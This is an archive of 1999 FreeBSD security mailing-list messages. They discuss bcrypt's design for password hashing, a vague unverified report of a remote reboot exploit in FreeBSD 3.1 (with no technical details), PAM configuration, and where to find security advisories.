| > used as a block cipher. What exactly is magically blessed about MD5?
| > MD5's compression function (or MD5 itself) functions perfectly well as
| > a block cipher in OFB or CFB modes. Is there some directive from the
| > US government allowing the export of MD5 in source form?
|
| Are you suggesting the use of MD5? I'm assuming it would be bad to use MD5
| because it is much quicker for one to possibly crack users' passwords..
I'm suggesting that a design that uses a cipher to do a hash function's job is sub-optimal, except in cases where such adaption can be shown to have advantages. Such advantages can include tweaking the noses of the export control authorities, taking advantage of fast or secure hardware, taking better advantage of few gates in hardware, or extensive analysis of the underlying algorithm. In the case of DES, it can be argued that the heavy analysis that crypt() has undergone can be seen as an advantage, but that advantage doesn't carry to *fish.

If you want to use any other construction, you'll need to analyze time issues, including brute force timing. It seems likely that using md5 would require a bunch of iterations. You could probably use fewer iterations of SHA-1, and yet fewer with RIPEMD-160 to absorb the same amount of attacker CPU time.

Adam

--
"It is seldom that liberty of any kind is lost all at once."
                                                       -Hume

From owner-freebsd-security Mon May  3 13:17:17 1999
Delivered-To: freebsd-security@freebsd.org
Received: from brooklyn.slack.net (brooklyn.slack.net [206.41.21.102]) by hub.freebsd.org (Postfix) with ESMTP id CB20614EA2 for ; Mon, 3 May 1999 13:16:07 -0700 (PDT) (envelope-from andrewr@brooklyn.slack.net)
Received: from localhost (andrewr@localhost) by brooklyn.slack.net (8.8.7/8.8.7) with SMTP id QAA29202; Mon, 3 May 1999 16:18:29 -0400 (EDT)
Date: Mon, 3 May 1999 16:18:29 -0400 (EDT)
From: andrewr
To: Adam Shostack
Cc: David Mazieres, phk@critter.freebsd.dk, peter.jeremy@auss2.alcatel.com.au, freebsd-security@FreeBSD.ORG, provos@openbsd.org
Subject: Re: Blowfish/Twofish
In-Reply-To: <19990503155204.A28374@weathership.homeport.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 3 May 1999, Adam Shostack wrote:

> If you want to use any other construction, you'll need to
> analyze time issues, including brute force timing. It seems likely
> that using md5 would require a bunch of iterations. You could
> probably use fewer iterations of SHA-1, and yet fewer with RIPEMD-160
> to absorb the same amount of attacker CPU time.

The multiple iterations is something that is *very* necessary and I agree with you on.. Take ssh, from what I've seen, in my VERY LITTLE code browsing of it, it does not seem to do many iterations at all (when dealing with ssh key), therefore not making it too great.. (if that makes any sense ;). However, bruteforce timing is something that *should* be analyzed, so I agree with you 100%.

Andrew

> Adam
>
> --
> "It is seldom that liberty of any kind is lost all at once."
> -Hume

From owner-freebsd-security Mon May  3 15:31:16 1999
Delivered-To: freebsd-security@freebsd.org
Received: from reeducation-labor.lcs.mit.edu (reeducation-labor.lcs.mit.edu [18.26.4.10]) by hub.freebsd.org (Postfix) with ESMTP id 894D014F86 for ; Mon, 3 May 1999 15:31:10 -0700 (PDT) (envelope-from dm@reeducation-labor.lcs.mit.edu)
Received: (from dm@localhost) by reeducation-labor.lcs.mit.edu (8.9.3/8.8.7) id SAA12518; Mon, 3 May 1999 18:24:40 -0400 (EDT)
Date: Mon, 3 May 1999 18:24:40 -0400 (EDT)
Message-Id: <199905032224.SAA12518@reeducation-labor.lcs.mit.edu>
From: David Mazieres
To: adam@homeport.org
Cc: andrewr@slack.net, phk@critter.freebsd.dk, peter.jeremy@auss2.alcatel.com.au, freebsd-security@FreeBSD.ORG, provos@openbsd.org
In-reply-to: <19990503155204.A28374@weathership.homeport.org> (message from Adam Shostack on Mon, 3 May 1999 15:52:05 -0400)
Subject: Re: Blowfish/Twofish
References: <199905031554.LAA09846@reeducation-labor.lcs.mit.edu> <19990503155204.A28374@weathership.homeport.org>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Well, I've browsed the freebsd website mailing list archives a little bit, and would like to respond to several points that have come up in discussion.

If you read our paper (ftp://cag.lcs.mit.edu/pub/dm/papers/provos:bcrypt.ps.gz), keep in mind that we are making two points: First, we suggest a specific set of criteria that any password function should aspire to. Second, we suggest a particular algorithm, namely bcrypt, that we conjecture satisfies these properties.

I like bcrypt because it seems to achieve all the important properties of a password function while being very conservatively based on a well-analyzed block cipher. Of course, I'm sure other people can design equally good hashing functions. While I would like to see more operating systems adopt bcrypt, I'm not going to defend bcrypt against largely non-technical objections. To the extent that people are missing some of the important motivating factors behind bcrypt's design, however, I will respond to certain objections in the hopes of helping people contemplating designing yet another password system (whether based on twofish or SRP).

Points people have made:

* Bcrypt is export restricted

I can't offer legal advice on this point. However, since FreeBSD already distributes arc4random, it should be easy to create an implementation of bcrypt that can no more easily be used for encryption. Such an implementation would presumably be exportable.

* People shouldn't use block ciphers as hash functions
* The security of a password hash based on a block cipher is suboptimal.
* The performance of a password hash based on a block cipher is suboptimal.

One of the most basic requirements of any block cipher is that it resist known plaintext attacks. In other words, if an attacker knows a message M and an encryption E_k(M), he should have no way of recovering the encryption key k (other than by brute force guessing). In practice, block ciphers must resist more powerful attacks--for instance, a "chosen plaintext/ciphertext" attack in which the bad guy gets to evaluate the encryption/decryption function on arbitrary values in his effort to recover k. In the case of bcrypt, we are only relying on Blowfish's resistance to known plaintext attacks. Thus, bcrypt has a cryptographically sound design based on the very reasonable assumption that Blowfish resists known plaintext attacks.

There are several other reasons one might not want to use a block cipher as a hash function, but none of them apply to bcrypt. One reason is that the domain of a hash function might be larger than the key space (e.g. MD5 has an input size of up to 2^64 bits, while bcrypt only allows 448 bits). This is irrelevant for password hashing, since above a certain length of password you only care about 2nd preimage resistance. Bcrypt has better 2nd preimage resistance than MD5 and SHA-1 because of its larger output size.

Another reason to use hash functions is efficiency. Certainly bcrypt is too slow to be used as a general-purpose hash function. However, we specifically designed it to be slow. Given bcrypt's application, the real performance issue is making sure that the algorithm runs as efficiently as possible during legitimate. That way users can crank the cost and make off-line guessing attacks more expensive. Bcrypt achieves this because it only uses operations that are fast in software.

One of the reasons I chose to use blowfish is that it consumes a fair amount of space (4KB). This makes it harder to create a pipelined hardware implementation of bcrypt. None of the popular hash functions (e.g. MD5, SHA-1, tiger) have this property, because they are all designed to run fast in different settings. Since absolute speed was not a goal of bcrypt, blowfish seemed like an attractive algorithm to use as a base.

* Don't use the number pi to encrypt

I'm not sure I entirely understand this objection. In order to frustrate hardware implementations of a hashing function based on a block cipher, it seems very desirable to choose a cipher with "secret" S-boxes--that is S-boxes that depend on the encryption key. It's even better if you can repeatedly run the key schedule to keep modifying the S-boxes based on their previous state. That way, you end up with a large amount of memory that must constantly be accessed and modified during the key schedule (which is the expensive part of bcrypt), and with an algorithm that exhibits little parallelism.

The point of initially filling the S-boxes with the digits of pi is that Bruce Schneier did not invent the digits of pi. Thus, one can reasonably believe that he did not maliciously construct the initial S-boxes to weaken the cipher in some secret way. Better yet, because the digits of pi are essentially unrelated to the rest of the block cipher, we can make a reasonable argument that spinning the key schedule multiple times does not weaken the encryption algorithm. If, for instance, blowfish's initial S-boxes were specifically designed to resist linear cryptanalysis [I'm not sure why you would do this, since the initial S-boxes aren't the eventual ones], then spinning the key schedule a second time might actually weaken security. Here, however, we can claim that the "generalized blowfish problem" in which the initial S-boxes are random is probably as hard as breaking regular blowfish, and the multiple key schedule blowfish problem is probably as hard as the generalized one.

* Who cares? We should all be running SRP anyway.

SRP is a nice protocol, but its use is somewhat orthogonal to bcrypt. The point of bcrypt is to avoid password guessing when the SRP server is compromised. In a research project I am currently working on, we use SRP in conjunction with eksblowfish (the algorithm bcrypt is based on). We use eksblowfish to hash together the salt, password, SRP modulus, and hostname of the server, and use the result as the user's secret exponent (i.e. the discrete log of the verifier stored by the server). This makes an off-line guessing attack against a compromised SRP database very expensive.

An alternative approach would be to use a fast hash function but choose a much larger prime as the SRP modulus. This would increase the cost of exponentiation when comparing hashes of password guesses to a user's verifier. However, it would also unnecessarily cost the server CPU time during execution of the algorithm and increase the size of messages across the wire. Since there are also good optimizations one can perform to speed up multiple exponentiations of the same base, an attacker may still be able to achieve a reasonable speedup compared to a legitimate execution of the protocol (depending on the implementation). A better approach is just to have the client perform a more expensive hash of the password.

So even if you use SRP, you should still use a variable-cost hash function on passwords before feeding them into the SRP algorithm.

David

From owner-freebsd-security Mon May  3 16:11:28 1999
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id DA988154AC for ; Mon, 3 May 1999 16:11:21 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id RAA05715 for ; Mon, 3 May 1999 17:11:17 -0600 (MDT)
Message-Id: <4.2.0.37.19990503171021.04dd6630@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta)
Date: Mon, 03 May 1999 17:11:14 -0600
To: security@freebsd.org
From: Brett Glass
Subject: Claimed remote reboot exploit: Real or bogus?
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Can anyone confirm or deny the existence of this exploit?
>Return-Path:
>Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id QAA05374 for ; Mon, 3 May 1999 16:34:55 -0600 (MDT)
>Received: from netspace.org ([128.148.157.6]:25967 "EHLO netspace.org" ident: "TIMEDOUT2") by brimstone.netspace.org with ESMTP id <44338-4047>; Mon, 3 May 1999 18:31:54 -0400
>Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8d) with spool id 452434 for BUGTRAQ@NETSPACE.ORG; Mon, 3 May 1999 22:31:01 +0000
>Approved-By: aleph1@UNDERGROUND.ORG
>Received: from dilbert.exodus.net (dilbert.exodus.net [216.33.66.132]) by netspace.org (8.8.7/8.8.7) with ESMTP id EAA31442 for ; Sat, 1 May 1999 04:17:47 -0400
>Received: (from jamie@localhost) by dilbert.exodus.net (8.9.1/8.9.1) id DAA24310 for bugtraq@netspace.org; Sat, 1 May 1999 03:18:40 -0500 (CDT)
>Mime-Version: 1.0
>Content-Type: text/plain; charset=us-ascii
>X-Mailer: Mutt 0.95.1i
>RFC_Violation: You saw it here first!
>X-PGP-Fingerprint: <921C135D> C4 48 1B 26 18 7B 1F D9 BA C4 9C 7A B1 07 07 E8
>X-No-Archive: Yes
>X-Contact-Analog: ph:312.425.7140 fx:312.425.7240
>X-Contact-Page: 888.740.9533 || 7409533@skytel.com
>Message-ID: <19990501031840.A24252@dilbert.exodus.net>
>Date: Sat, 1 May 1999 03:18:40 -0500
>Reply-To: jamie@exodus.net
>Sender: Bugtraq List
>From: Jamie Rishaw
>Subject: FreeBSD 3.1 remote reboot exploit
>To: BUGTRAQ@netspace.org
>X-UIDL: bb7cd1086853f3805dc34b1136a06c40
>
>Hi,
>
> Sorry to be so vague, but I wanted to let everyone know,
>
> It's been demonstrated to me by two people who will not reveal "how"
>that there is a remote bug exploit, almost certainly over IP, that will
>cause FreeBSD-3.1 systems to reboot with no warnings.
>
> The second box this was demonstrated on today had no open services
>besides ircd, and was remote rebooted. (The first box had open services
>such as smtp, ssh, pop, http, but did /not/ run ircd, eliminating ircd
>as the culprit).
>
> If anyone can shed some light on this (really bad) issue, it'd be
>greatly appreciated, especially since I am(was) in the process of
>upgrading all of my boxes to 3.1. (3.1-REL).
>
> Regards,
>
>-jamie
>--
>jamie rishaw (efnet:gavroche) -- Exodus Communications, Inc.
>>Sr. Network Engr, Chicago, SoCal Data Centers
> In an interesting move Exodus Communications announced today that
> they have replaced all of their backbone engineers with furby's

From owner-freebsd-security Mon May  3 16:14:30 1999
Delivered-To: freebsd-security@freebsd.org
Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by hub.freebsd.org (Postfix) with ESMTP id 8BADF154AC for ; Mon, 3 May 1999 16:14:27 -0700 (PDT) (envelope-from danderse@cs.utah.edu)
Received: from torrey.cs.utah.edu (torrey.cs.utah.edu [155.99.212.91]) by wrath.cs.utah.edu (8.8.8/8.8.8) with ESMTP id RAA28602; Mon, 3 May 1999 17:14:26 -0600 (MDT)
Received: (from danderse@localhost) by torrey.cs.utah.edu (8.9.1/8.9.1) id RAA20781; Mon, 3 May 1999 17:14:26 -0600 (MDT) (envelope-from danderse@cs.utah.edu)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Date: Mon, 3 May 1999 17:14:26 -0600 (MDT)
From: "David G. Andersen"
To: Brett Glass
Cc: security@FreeBSD.ORG
Subject: Re: Claimed remote reboot exploit: Real or bogus?
In-Reply-To: Brett Glass's message of Mon, May 3 1999 <4.2.0.37.19990503171021.04dd6630@localhost>
References: <4.2.0.37.19990503171021.04dd6630@localhost>
X-Mailer: VM 6.43 under 20.4 "Emerald" XEmacs Lucid
Message-ID: <14126.11662.104650.743414@torrey.cs.utah.edu>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I've asked for a bit more information from Jamie, but that was about 3 minutes ago, so I don't expect to hear back quite so soon.

If his boxes are being rebooted, it's probably legitimate.
Jamie's trustworthy, and competent.

  -Dave

Lo and Behold, Brett Glass said:
> Can anyone confirm or deny the existence of this exploit?
>
> >Reply-To: jamie@exodus.net
> >Sender: Bugtraq List
> >From: Jamie Rishaw
> >Subject: FreeBSD 3.1 remote reboot exploit
> >To: BUGTRAQ@netspace.org
> >X-UIDL: bb7cd1086853f3805dc34b1136a06c40
> >
> >Hi,
> >
> > Sorry to be so vague, but I wanted to let everyone know,
> >
> > It's been demonstrated to me by two people who will not reveal "how"
> >that there is a remote bug exploit, almost certainly over IP, that will
> >cause FreeBSD-3.1 systems to reboot with no warnings.
> >
> > The second box this was demonstrated on today had no open services
> >besides ircd, and was remote rebooted. (The first box had open services
> >such as smtp, ssh, pop, http, but did /not/ run ircd, eliminating ircd
> >as the culprit).
> >
> > If anyone can shed some light on this (really bad) issue, it'd be
> >greatly appreciated, especially since I am(was) in the process of
> >upgrading all of my boxes to 3.1. (3.1-REL).

--
work: danderse@cs.utah.edu                 me: angio@pobox.com
      University of Utah                       http://www.angio.net/
      Computer Science - Flux Research Group   "What's footnote FIVE?"

From owner-freebsd-security Mon May  3 16:29:33 1999
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 7727E14BC9 for ; Mon, 3 May 1999 16:29:31 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id RAA05962; Mon, 3 May 1999 17:29:24 -0600 (MDT)
Message-Id: <4.2.0.37.19990503172000.04f63ee0@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta)
Date: Mon, 03 May 1999 17:29:20 -0600
To: "David G. Andersen"
From: Brett Glass
Subject: Re: Claimed remote reboot exploit: Real or bogus?
Cc: security@FreeBSD.ORG
In-Reply-To: <14126.11662.104650.743414@torrey.cs.utah.edu>
References: <4.2.0.37.19990503171021.04dd6630@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

If I were Jamie, I would have had a network analyzer on the line during the "demonstration."

We've held off on installing 3.1-R on our servers because we always wait for the second "production" point release of any major version before upgrading. (This policy has kept us at 2.2.8 -- plus patches -- for the time being.) We have come under fire on a few mailing lists for this, but if the exploit is for real it will vindicate our conservative practices yet again.

Still, the release of 3.2-R is nigh, and we DO want to install that one. So, we'd like to see the exploit identified and squashed before 3.2-R goes out the door.

--Brett

At 05:14 PM 5/3/99 -0600, David G. Andersen wrote:
>I've asked for a bit more information from Jamie, but that was about 3
>minutes ago, so I don't expect to hear back quite so soon.
>
>If his boxes are being rebooted, it's probably legitimate. Jamie's
>trustworthy, and competent.
> > -Dave To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 16:32:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from fed-ef1.frb.gov (fed.frb.gov [132.200.32.32]) by hub.freebsd.org (Postfix) with ESMTP id 5C81B14BC9; Mon, 3 May 1999 16:32:18 -0700 (PDT) (envelope-from seth@freebie.dp.ny.frb.org) Received: by fed-ef1.frb.gov; id TAA18455; Mon, 3 May 1999 19:32:18 -0400 (EDT) Received: from m1pmdf.frb.gov(192.168.3.38) by fed.frb.gov via smap (V4.2) id xma018420; Mon, 3 May 99 19:32:15 -0400 Date: Mon, 03 May 1999 19:32:11 -0400 (EDT) From: Seth Subject: FreeBSD 3.1 remote reboot exploit (fwd) To: freebsd-stable@freebsd.org, security@freebsd.org Message-id: MIME-version: 1.0 Content-type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Just hit bugtraq, figured people might want to get in touch or start digging. SB ---------- Forwarded message ---------- Date: Sat, 01 May 1999 03:18:40 -0500 From: Jamie Rishaw To: BUGTRAQ@netspace.org Subject: FreeBSD 3.1 remote reboot exploit Hi, Sorry to be so vague, but I wanted to let everyone know, It's been demonstrated to me by two people who will not reveal "how" that there is a remote bug exploit, almost certainly over IP, that will cause FreeBSD-3.1 systems to reboot with no warnings. The second box this was demonstrated on today had no open services besides ircd, and was remote rebooted. (The first box had open services such as smtp, ssh, pop, http, but did /not/ run ircd, eliminating ircd as the culprit). If anyone can shed some light on this (really bad) issue, it'd be greatly appreciated, especially since I am(was) in the process of upgrading all of my boxes to 3.1. (3.1-REL). Regards, -jamie -- jamie rishaw (efnet:gavroche) -- Exodus Communications, Inc. >Sr. 
Network Engr, Chicago, SoCal Data Centers In an interesting move Exodus Communications annouced today that they have replaced all of their backbone engineers with furby's To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 3 16:40:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from paprika.michvhf.com (paprika.michvhf.com [209.57.60.12]) by hub.freebsd.org (Postfix) with SMTP id 26A1314EC4 for ; Mon, 3 May 1999 16:40:55 -0700 (PDT) (envelope-from vev@michvhf.com) Received: (qmail 11372 invoked by uid 1001); 3 May 1999 23:40:59 -0000 Message-ID: X-Mailer: XFMail 1.3 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: Date: Mon, 03 May 1999 19:40:59 -0400 (EDT) X-Face: *0^4Iw) To: Seth Subject: RE: FreeBSD 3.1 remote reboot exploit (fwd) Cc: freebsd-stable@freebsd.org, security@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 03-May-99 Seth wrote: > Just hit bugtraq, figured people might want to get in touch or start > digging. It's typically in bad taste to post it to BugTraq before contacting the vendor. Vince. 
--
==========================================================================
Vince Vielhaber -- KA8CSH    email: vev@michvhf.com    flame-mail: /dev/null
       # include                TEAM-OS2
   Online Campground Directory    http://www.camping-usa.com
  Online Giftshop Superstore      http://www.cloudninegifts.com
==========================================================================

From owner-freebsd-security Mon May 3 16:44:24 1999
Date: Mon, 03 May 1999 19:43:15 -0400 (EDT)
From: Seth
To: Vince Vielhaber
Cc: freebsd-stable@freebsd.org, security@freebsd.org
Subject: RE: FreeBSD 3.1 remote reboot exploit (fwd)

I didn't post it. I didn't see it hit the lists, so I relayed it. Don't
shoot the messenger! :)

SB

On Mon, 3 May 1999, Vince Vielhaber wrote:

>
> On 03-May-99 Seth wrote:
> > Just hit bugtraq, figured people might want to get in touch or start
> > digging.
>
> It's typically in bad taste to post it to BugTraq before contacting the
> vendor.
>
> Vince.
> --
> ==========================================================================
> Vince Vielhaber -- KA8CSH    email: vev@michvhf.com    flame-mail: /dev/null
>        # include                TEAM-OS2
>    Online Campground Directory    http://www.camping-usa.com
>   Online Giftshop Superstore      http://www.cloudninegifts.com
> ==========================================================================
>

From owner-freebsd-security Mon May 3 16:51:27 1999
Date: Mon, 03 May 1999 19:51:23 -0400 (EDT)
To: Seth
Cc: freebsd-stable@freebsd.org, security@freebsd.org
Subject: RE: FreeBSD 3.1 remote reboot exploit (fwd)

On 03-May-99 Seth wrote:
> I didn't post it. I didn't see it hit the lists, so I relayed it. Don't
> shoot the messenger! :)

Sorry, I read your comment as you telling him to "Just hit bugtraq" with it
and someone there will find it real quick.

Vince.

>
> SB
>
> On Mon, 3 May 1999, Vince Vielhaber wrote:
>
>>
>> On 03-May-99 Seth wrote:
>> > Just hit bugtraq, figured people might want to get in touch or start
>> > digging.
>>
>> It's typically in bad taste to post it to BugTraq before contacting the
>> vendor.
>>

--
==========================================================================
Vince Vielhaber -- KA8CSH    email: vev@michvhf.com    flame-mail: /dev/null
       # include                TEAM-OS2
   Online Campground Directory    http://www.camping-usa.com
  Online Giftshop Superstore      http://www.cloudninegifts.com
==========================================================================

From owner-freebsd-security Mon May 3 17:42:30 1999
Date: Mon, 3 May 1999 19:38:37 -0500
From: "Matthew D. Fuller"
To: "Jordan K. Hubbard"
Cc: "Jeroen C. van Gelderen", Robert Watson, Poul-Henning Kamp, The Tech-Admin Dude, Brian Beaulieu, freebsd-security@FreeBSD.ORG
Subject: Re: Blowfish/Twofish
Message-ID: <19990503193836.D1229@netalpha.net>
References: <372C19F5.625BB2B@vangelderen.org> <23332.925637575@zippy.cdrom.com>
In-Reply-To: <23332.925637575@zippy.cdrom.com>; from Jordan K. Hubbard on Sun, May 02, 1999 at 02:32:55AM -0700

On Sun, May 02, 1999 at 02:32:55AM -0700, a little birdie told me
that Jordan K. Hubbard remarked
>
> Erm, one of the goals of PAM is to support *multiple* encryption
> methods, so why not do a PAM module for each and let the administrator
> decide which authentication methods to support in /etc/pam.conf?

So how far are we from being able to say 'Accept DES, prefer MD5, and
always use MD5 for new passwords' with PAM?
What pieces are we missing?

--
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
| Matthew Fuller     MF4839     http://www.over-yonder.net/ |
* fullermd@futuresouth.com         fullermd@over-yonder.net *
| UNIX Systems Administrator        Specializing in FreeBSD |
* FutureSouth Communications       ISPHelp ISP Consulting   *
| "The only reason I'm burning my candle at both ends,      |
*  is because I haven't figured out how to light the        *
|  middle yet"                                              |
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

From owner-freebsd-security Mon May 3 17:48:20 1999
Date: Mon, 03 May 1999 17:42:58 -0700
From: "Jordan K. Hubbard"
To: "Matthew D. Fuller"
Cc: "Jeroen C. van Gelderen", Robert Watson, Poul-Henning Kamp, The Tech-Admin Dude, Brian Beaulieu, freebsd-security@FreeBSD.ORG
Subject: Re: Blowfish/Twofish
In-reply-to: Your message of "Mon, 03 May 1999 19:38:37 CDT." <19990503193836.D1229@netalpha.net>
Message-ID: <30464.925778578@zippy.cdrom.com>

> So how far are we from being able to say 'Accept DES, prefer MD5, and
> always use MD5 for new passwords' with PAM? What pieces are we missing?

We can do that right now, though PAM doesn't "prefer" so much as simply try
things in the order you specify. Humans prefer things, programs just do
them. :-)

The "new password" selection is handled by /etc/auth.conf

- Jordan

From owner-freebsd-security Mon May 3 18:10:45 1999
Message-ID: <372E4911.3A384379@tdnet.com.br>
Date: Mon, 03 May 1999 22:10:41 -0300
From: Gustavo V G C Rios
To: security@freebsd.org
Subject: Security advisories

Where can I get security advisories for FreeBSD 2.2.8-Stable?
http://www.freebsd.org/security/#adv is too old! The last one is 08/98.
FreeBSD is a very secure OS, or nobody knows its bugs; what's the truth?

How can I keep myself up to date with security under FreeBSD?
From owner-freebsd-security Mon May 3 18:34:04 1999
Date: Mon, 3 May 1999 18:34:02 -0700 (PDT)
From: Evil Dave
Message-Id: <199905040134.SAA04318@kizmiaz.dis.org>
To: freebsd-security@freebsd.org
Subject: pam opie module

folks,

someone requested this and i promptly lost the email. so, i'm going to put
it up for anonymous ftp on flag.blackened.net in /pub/opie/

-rw-r--r--  1 1000  1000  6410 May  4 01:30 opie.shar

enjoy

dave

From owner-freebsd-security Mon May 3 18:41:38 1999
Message-Id: <199905040140.SAA01305@dingo.cdrom.com>
Date: Mon, 03 May 1999 18:40:30 -0700
From: Mike Smith
To: Seth
Cc: freebsd-stable@freebsd.org, security@freebsd.org, jamie@exodus.net
Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd)
In-reply-to: Your message of "Mon, 03 May 1999 19:32:11 EDT."

I have to say that Jamie really let us down by not running a raw tcpdump
alongside the second targeted machine here. Any chance of provoking these
people into "demonstrating" the exploit on a machine, while another
connected to the same wire is running

    tcpdump -s 2000 -w splot.raw

and then sending us the 'splot.raw' file?

> Just hit bugtraq, figured people might want to get in touch or start
> digging.
>
> SB
>
> ---------- Forwarded message ----------
> Date: Sat, 01 May 1999 03:18:40 -0500
> From: Jamie Rishaw
> To: BUGTRAQ@netspace.org
> Subject: FreeBSD 3.1 remote reboot exploit
>
> Hi,
>
> Sorry to be so vague, but I wanted to let everyone know,
>
> It's been demonstrated to me by two people who will not reveal "how"
> that there is a remote bug exploit, almost certainly over IP, that will
> cause FreeBSD-3.1 systems to reboot with no warnings.
>
> The second box this was demonstrated on today had no open services
> besides ircd, and was remote rebooted. (The first box had open services
> such as smtp, ssh, pop, http, but did /not/ run ircd, eliminating ircd
> as the culprit).
>
> If anyone can shed some light on this (really bad) issue, it'd be
> greatly appreciated, especially since I am(was) in the process of
> upgrading all of my boxes to 3.1. (3.1-REL).
>
> Regards,
>
> -jamie
> --
> jamie rishaw (efnet:gavroche) -- Exodus Communications, Inc. >Sr. Network Engr, Chicago, SoCal Data Centers
> In an interesting move Exodus Communications announced today that
> they have replaced all of their backbone engineers with furby's
>

--
\\  Sometimes you're ahead,        \\  Mike Smith
\\  sometimes you're behind.       \\  mike@smith.net.au
\\  The race is long, and in the   \\  msmith@freebsd.org
\\  end it's only with yourself.   \\  msmith@cdrom.com

From owner-freebsd-security Mon May 3 20:43:21 1999
Date: Mon, 03 May 1999 20:42:48 -0700
From: "Jordan K. Hubbard"
To: Mike Smith
Cc: Seth, freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG, jamie@exodus.net
Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd)
In-reply-to: Your message of "Mon, 03 May 1999 18:40:30 PDT." <199905040140.SAA01305@dingo.cdrom.com>
Message-ID: <30986.925789368@zippy.cdrom.com>

> I have to say that Jamie really let us down by not running a raw
> tcpdump alongside the second targeted machine here. Any chance of
> provoking these people into "demonstrating" the exploit on a machine,
> while another connected to the same wire is running

I'd say he or whoever first reported this to bugtraq let us down even more
by releasing an "advisory" in such an unknown and unverifiable state. By
doing so, all they've done is hand ammunition to the FUD corps and given us
no reasonable chance to respond since the advisory is so content-free as to
be completely worthless. Saying that "you saw something crash the box" is
like telling the highway patrol that you "saw a stranded motorist somewhere
between San Francisco and New York (and oh yeah, it was on a road!)" - what
the hell are they supposed to do with a report like that?
Auditing the entire operating system in search of such a reboot bug would be
about as effective (and practical) as trying to search the entire U.S.
highway system from coast to coast.

If we want to actually achieve something with these little security alerts
(other than to get people to stop reading them because they cry "Wolf!" all
the time), we need to do a lot better than this. This didn't even meet the
most minimal standards for competence I'd expect from someone in this
industry.

- Jordan

From owner-freebsd-security Mon May 3 20:51:07 1999
Date: Mon, 3 May 1999 22:51:32 -0500
From: Chris Costello
To: "Jordan K. Hubbard"
Cc: Mike Smith, Seth, freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG, jamie@exodus.net
Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd)
Message-ID: <19990503225131.I10291@holly.dyndns.org>
Reply-To: chris@calldei.com
References: <199905040140.SAA01305@dingo.cdrom.com> <30986.925789368@zippy.cdrom.com>
In-Reply-To: <30986.925789368@zippy.cdrom.com>; from Jordan K. Hubbard on Mon, May 03, 1999 at 08:42:48PM -0700

On Mon, May 3, 1999, Jordan K. Hubbard wrote:
> > I have to say that Jamie really let us down by not running a raw
> > tcpdump alongside the second targeted machine here. Any chance of
> > provoking these people into "demonstrating" the exploit on a machine,
> > while another connected to the same wire is running
>
> I'd say he or whoever first reported this to bugtraq let us down even
> more by releasing an "advisory" in such an unknown and unverifiable
> state. By doing so, all they've done is hand ammunition to the FUD
> corps and given us no reasonable chance to respond since the advisory

   I get the impression that that was the whole point of the bugtraq post,
to give us more grief.

[chop]

> - Jordan

--
Chris Costello
E Pluribus UNIX.

From owner-freebsd-security Mon May 3 21:01:25 1999
Date: Mon, 3 May 1999 21:11:05 -0700
From: Andre Gironda
To: security@FreeBSD.ORG
Cc: "Jordan K. Hubbard", Mike Smith, Seth, freebsd-stable@FreeBSD.ORG, jamie@exodus.net
Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd)
Message-ID: <19990503211105.F4424@toaster.sun4c.net>
References: <199905040140.SAA01305@dingo.cdrom.com> <30986.925789368@zippy.cdrom.com>
In-Reply-To: <30986.925789368@zippy.cdrom.com>; from Jordan K. Hubbard on Mon, May 03, 1999 at 08:42:48PM -0700

On Mon, May 03, 1999 at 08:42:48PM -0700, Jordan K. Hubbard wrote:
> "Wolf!" all the time), we need to do a lot better than this. This
> didn't even meet the most minimal standards for competence I'd expect
> from someone in this industry.
>
